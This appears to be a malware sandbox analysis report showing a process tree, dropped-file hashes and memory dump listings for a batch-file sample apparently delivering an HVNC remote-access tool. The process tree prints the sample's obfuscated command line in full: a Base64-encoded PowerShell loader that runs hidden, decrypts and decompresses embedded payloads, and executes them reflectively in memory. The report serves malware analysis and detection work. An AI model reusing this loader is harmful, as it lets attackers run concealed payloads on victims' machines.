C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\update.cmd"
2⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\update.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTmpxc2koJGFGRGxFKXskRlVRT209W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEZVUU9tLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskRlVRT20uUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRGVVFPbS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnQUhUZE9FL3hjdmdJSHFUajZEOGhsZStsMTdONklWWTVzOVlhSjE4WmpPWT0nKTskRlVRT20uSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZ0Q5RS9pL2x6Wk1NMXgrQWtTUVdTQT09Jyk7JGZUdURqPSRGVVFPbS5DcmVhdGVEZWNyeXB0b3IoKTskY2NVVko9JGZUdURqLlRyYW5zZm9ybUZpbmFsQmxvY2soJGFGRGxFLDAsJGFGRGxFLkxlbmd0aCk7JGZUdURqLkRpc3Bvc2UoKTskRlVRT20uRGlzcG9zZSgpOyRjY1VWSjt9ZnVuY3Rpb24ga1FoZWsoJGFGRGxFKXska2ZtWmc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkYUZEbEUpOyRpV212WD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JHdSd2RrPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJGtmbVpnLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskd1J3ZGsuQ29weVRvKCRpV212WCk7JHdSd2RrLkRpc3Bvc2UoKTska2ZtWmcuRGlzcG9zZSgpOyRpV212WC5EaXNwb3NlKCk7JGlXbXZYLlRvQXJyYXkoKTt9JG1KZ3ViPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskdFBTeEY9a1FoZWsgKE5qcXNpIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1KZ3ViLCA1KS5TdWJzdHJpbmcoMikpKSk7JHlTZ2taPWtRaGVrIChOanFzaSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtSmd1YiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0keVNna1opLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHRQU3hGKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
3⤵
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 14756 -ip 14756
1⤵
PID:15444

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
1KB

MD5
9acca5d66a3c58ea7e00567f1ad5036a

SHA1
a9bdac2ae7826b859bbb81e0fcaa74029771c81e

SHA256
99d15f32faf3935aa51d2628cb37a636ecca08e70af3fd5acb439817dce0938d

SHA512
38428d1b6cc33cce1066cc8fc6da1f3d5fb6115ac846d953ff8222971f313a21178afcd4aedb697b53e1fed25b2e0b584135afdc46d9e6512d193cb331bbaecf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\AaregHVNC-bat.bat
Filesize
6KB

MD5
1384152932922f614f12020985ba47fe

SHA1
e6738b0cf0353517c182fb0dea03969702b69dac

SHA256
3b6c73bb4ed54925b8f609dbebe9cad9016e2df9ef4875302ab4060d082a73e0

SHA512
3ca576de2dc59e2d6e6636f5ddf3e51454b481865c3f89e3d8f0a4e2cbfd72ab1a0eef3709dd61a3892aecddb4120b4e985b9861a928467af5f14698cfffb5f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2tclcfn.sf4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1120-80-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/1120-76-0x0000019D53EA0000-0x0000019D53EB0000-memory.dmp

Filesize
64KB

Download
memory/1120-74-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Filesize
2.0MB

Download
memory/1120-75-0x00007FFEEF6A0000-0x00007FFEEF75E000-memory.dmp

Filesize
760KB

Download
memory/1120-79-0x00007FFEDD680000-0x00007FFEDD699000-memory.dmp

Filesize
100KB

Download
memory/1120-57-0x0000019D53EA0000-0x0000019D53EB0000-memory.dmp

Filesize
64KB

Download
memory/1120-56-0x0000019D53EA0000-0x0000019D53EB0000-memory.dmp

Filesize
64KB

Download
memory/1120-46-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/3704-37-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-35-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Filesize
2.0MB

Download
memory/3704-36-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/3704-0-0x000002BCDCC00000-0x000002BCDCC22000-memory.dmp

Filesize
136KB

Download
memory/3704-39-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-42-0x00007FFEDD680000-0x00007FFEDD699000-memory.dmp

Filesize
100KB

Download
memory/3704-43-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-44-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Filesize
2.0MB

Download
memory/3704-34-0x000002BCDD080000-0x000002BCDD096000-memory.dmp

Filesize
88KB

Download
memory/3704-32-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-33-0x000002BCDCDD0000-0x000002BCDCDE0000-memory.dmp

Filesize
64KB

Download
memory/3704-31-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-30-0x00007FFEEF6A0000-0x00007FFEEF75E000-memory.dmp

Filesize
760KB

Download
memory/3704-29-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Filesize
2.0MB

Download
memory/3704-1-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/3704-4-0x000002BCDC980000-0x000002BCDC990000-memory.dmp

Filesize
64KB

Download
memory/3704-83-0x000002BCDD850000-0x000002BCDD85E000-memory.dmp

Filesize
56KB

Download
memory/3704-82-0x000002BCDD830000-0x000002BCDD84E000-memory.dmp

Filesize
120KB

Download
memory/3704-28-0x000002BCDCDC0000-0x000002BCDCDCA000-memory.dmp

Filesize
40KB

Download
memory/3704-81-0x000002BCDD800000-0x000002BCDD810000-memory.dmp

Filesize
64KB

Download
memory/3704-12-0x000002BCDCFF0000-0x000002BCDD034000-memory.dmp

Filesize
272KB

Download
memory/3704-13-0x000002BCDD0C0000-0x000002BCDD136000-memory.dmp

Filesize
472KB

Download
memory/3796-121-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/3796-116-0x000001E86F450000-0x000001E86F464000-memory.dmp

Filesize
80KB

Download
memory/3796-115-0x000001E86F3B0000-0x000001E86F3D6000-memory.dmp

Filesize
152KB

Download
memory/3796-109-0x000001E86E7A0000-0x000001E86E7B0000-memory.dmp

Filesize
64KB

Download
memory/3796-103-0x000001E86E7A0000-0x000001E86E7B0000-memory.dmp

Filesize
64KB

Download
memory/3796-148-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/3796-117-0x000001E86E7A0000-0x000001E86E7B0000-memory.dmp

Filesize
64KB

Download
memory/3796-145-0x000001E86E7A0000-0x000001E86E7B0000-memory.dmp

Filesize
64KB

Download
memory/3796-102-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/4704-70-0x000002A9C2370000-0x000002A9C2380000-memory.dmp

Filesize
64KB

Download
memory/4704-71-0x000002A9C2370000-0x000002A9C2380000-memory.dmp

Filesize
64KB

Download
memory/4704-73-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/4704-65-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/4760-14-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/4760-27-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/4760-15-0x00000239EC5C0000-0x00000239EC5D0000-memory.dmp

Filesize
64KB

Download
memory/12616-87-0x00000151369A0000-0x00000151369B0000-memory.dmp

Filesize
64KB

Download
memory/12616-99-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/12616-85-0x00007FFED23C0000-0x00007FFED2E81000-memory.dmp

Filesize
10.8MB

Download
memory/12616-86-0x00000151369A0000-0x00000151369B0000-memory.dmp

Filesize
64KB

Download
memory/14756-137-0x0000000005D60000-0x0000000005DAC000-memory.dmp

Filesize
304KB

Download
memory/14756-139-0x0000000006320000-0x000000000633A000-memory.dmp

Filesize
104KB

Download
memory/14756-123-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/14756-124-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/14756-127-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/14756-135-0x0000000005810000-0x0000000005B64000-memory.dmp

Filesize
3.3MB

Download
memory/14756-136-0x0000000005D20000-0x0000000005D3E000-memory.dmp

Filesize
120KB

Download
memory/14756-119-0x00000000749C0000-0x0000000075170000-memory.dmp

Filesize
7.7MB

Download
memory/14756-138-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download
memory/14756-122-0x0000000004FE0000-0x0000000005608000-memory.dmp

Filesize
6.2MB

Download
memory/14756-140-0x0000000006FA0000-0x0000000007036000-memory.dmp

Filesize
600KB

Download
memory/14756-141-0x0000000006F40000-0x0000000006F62000-memory.dmp

Filesize
136KB

Download
memory/14756-142-0x00000000081B0000-0x0000000008754000-memory.dmp

Filesize
5.6MB

Download
memory/14756-143-0x0000000006F70000-0x0000000006F92000-memory.dmp

Filesize
136KB

Download
memory/14756-144-0x0000000007210000-0x0000000007224000-memory.dmp

Filesize
80KB

Download
memory/14756-118-0x0000000004970000-0x00000000049A6000-memory.dmp

Filesize
216KB

Download
memory/14756-146-0x00000000749C0000-0x0000000075170000-memory.dmp

Filesize
7.7MB

Download
memory/14756-120-0x0000000004960000-0x0000000004970000-memory.dmp

Filesize
64KB

Download